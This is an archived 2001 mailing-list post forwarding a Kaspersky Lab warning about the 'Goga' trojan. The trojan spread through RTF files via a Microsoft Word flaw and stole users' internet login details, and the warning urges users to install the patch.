Microsloth Rich Text Format security hole!

George at Orwellian.Org George at Orwellian.Org
Thu Jun 28 02:51:20 PDT 2001 

http://www.kaspersky.com/news.asp?tnews=0&nview=1&id=199&page=0
#    
#    Thursday, June 14, 2001
#    
#    Malicious Code in RTF Files: Yet another Prediction Comes True
#    
#    A Trojan program penetrates computers when reading RTF files
#    
#    Kaspersky Lab, an international data-security software-development 
#    company, warns users about the discovery of the Trojan "Goga" 
#    that steals and sends out from infected computers user details 
#    for Internet access (i.e. login, password and other information). 
#    Kaspersky Lab has already received several reports of the Trojan 
#    being detected "in the wild."
#    
#    "Goga" has two distinguishing features: the first is that it 
#    utilizes files in RTF format as a means for spreading, confusing 
#    users in as much as they believe these files to be absolutely 
#    safe, often opening them without first administering an anti-virus 
#    check. The second is that the Trojan exploits a well-known breach 
#    in the Microsoft Word security system, allowing a malefactor 
#    to launch a malicious code, unbeknownst to a user, immediately 
#    following the opening of an infected document.
#    
#    Breach hyperlink:
#    
#    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-028.asp
#    
#    Should a computer not be installed with the proper patch thwarting 
#    this breach, then when the infected RTF file is read, MS Word 
#    automatically downloads a template containing the malicious 
#    macro-program from a remote Web site without any warning 
#    whatsoever. This macro-program extracts additional utility from 
#    the RTF file?s binary section. This utility searches the infected 
#    computer and creates another TXT file containing user Internet 
#    access details. At this point, "Goga" starts up the script program 
#    that publishes the newely created TXT file in a Web-site guest 
#    book open to the general public. The virus writer is now able 
#    to periodically cull stolen information from this site.
#    
#    Kaspersky Lab warned users about falling prey to this RTF-file 
#    danger on May 29. We once again recommend that users install 
#    the MS Word patch defending against this Trojan and any other 
#    malicious programs exploiting this breach ASAP.
#
#    Detection and removal procedures have already been added
#    to the Kaspersky Anti-Virus database daily update.

More information about the cypherpunks-legacy mailing list